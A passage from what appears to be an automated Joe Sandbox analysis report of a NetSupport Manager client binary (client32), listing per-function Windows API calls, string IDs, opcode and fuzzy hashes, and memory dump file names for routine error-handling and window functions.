                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                                                                                                                    • API String ID: 0-3856134272
                                                                                                                                                                                                    • Opcode ID: b100d5d4233022e8e44f9cc269860516e9a81280fef5c0ee83371a58609a8e05
                                                                                                                                                                                                    • Instruction ID: b2f01cc33cf96cd7d64b71e3bc45feb1f3f5f8ef4c82cb259c390b308aa88610
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b100d5d4233022e8e44f9cc269860516e9a81280fef5c0ee83371a58609a8e05
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC012BBAE0060997DB10CE55F800ADBB398DFC037DF04883AEA5E93501E231F5D18692
                                                                                                                                                                                                    Function 110D12D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110D12E3
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 110D1308
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 1785806476-3788999226
                                                                                                                                                                                                    • Opcode ID: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
                                                                                                                                                                                                    • Instruction ID: facce5f6267de455672404faedde13971752726d79346e18a4f89ee43adb8f58
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF014FB6A007055FD720DE6DD880DA7F7E8EF95658310862EE5A6C3644EE31F9508AA0
                                                                                                                                                                                                    Function 11053470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                    • String ID: Client$IgnoreBroadcastMsg
                                                                                                                                                                                                    • API String ID: 269201875-2698719660
                                                                                                                                                                                                    • Opcode ID: 406f8391fbd20ee1c0b2c9e892d905c69960e8590cde297a0bd1aef1293b93f6
                                                                                                                                                                                                    • Instruction ID: 7f2d190c9cc5e7471165cdc2c35737031f60f48fc0dccb1818e423c3a41c3cb6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 406f8391fbd20ee1c0b2c9e892d905c69960e8590cde297a0bd1aef1293b93f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC01F976E0511A96DBC1DEA5EC81B5BB79C9F42318F044471E919DA185FE30F8408B72
                                                                                                                                                                                                    Function 110CF020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                                                                    • Opcode ID: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
                                                                                                                                                                                                    • Instruction ID: ac41a9a0db9df06f4d8a16ffcac00abdbc7d2a047ef6ca5be1778eb271469bd1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0A479A0412D7BDB40DAA8DC40BEEFBBD9B45A04F4040EDEA45A7240DF306E498BA5
                                                                                                                                                                                                    Function 110CF0A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                                                                    • Opcode ID: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                                                                                                    • Instruction ID: b1f8247c4ebfb1806b65041ddde5ed66821e01f400e323cd5dcc56784af5e4be
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0A475A0012DBBDB50DA98DC80BEEFFAC9B45604F1040A9EA09A7140DF306A45C7A5
                                                                                                                                                                                                    Function 11075520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeferWindowPos.USER32(8B000E80,00000000,F8E85BC0,33CD335E,?,00000000,33CD335E,11076276), ref: 11075563
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11075536
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11075531
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeferErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 889670253-2830328467
                                                                                                                                                                                                    • Opcode ID: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction ID: 0f53da842d51b2bc1a575ce598d94f232e02cc1422780aacd45dca11e73889ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF01CB661021DAFC704CE89DC80EEBB3EDEB9C754F008119FA19D3250D630E950CBA4
                                                                                                                                                                                                    Function 11017000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11017039
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: QueueUserWorkItem
                                                                                                                                                                                                    • API String ID: 199729137-2469634949
                                                                                                                                                                                                    • Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                                                                                                    • Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0
                                                                                                                                                                                                    Function 11031020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11031055
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: ProcessIdToSessionId
                                                                                                                                                                                                    • API String ID: 199729137-2164408197
                                                                                                                                                                                                    • Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                                                                                                    • Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0
                                                                                                                                                                                                    Function 11157300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(75BF1A30), ref: 11157303
                                                                                                                                                                                                      • Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2
                                                                                                                                                                                                    • GetWindowTextA.USER32(75BF1A30,00000000,00000001), ref: 1115731D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: TextWindow$Length_memset
                                                                                                                                                                                                    • String ID: ...
                                                                                                                                                                                                    • API String ID: 243528429-1685331755
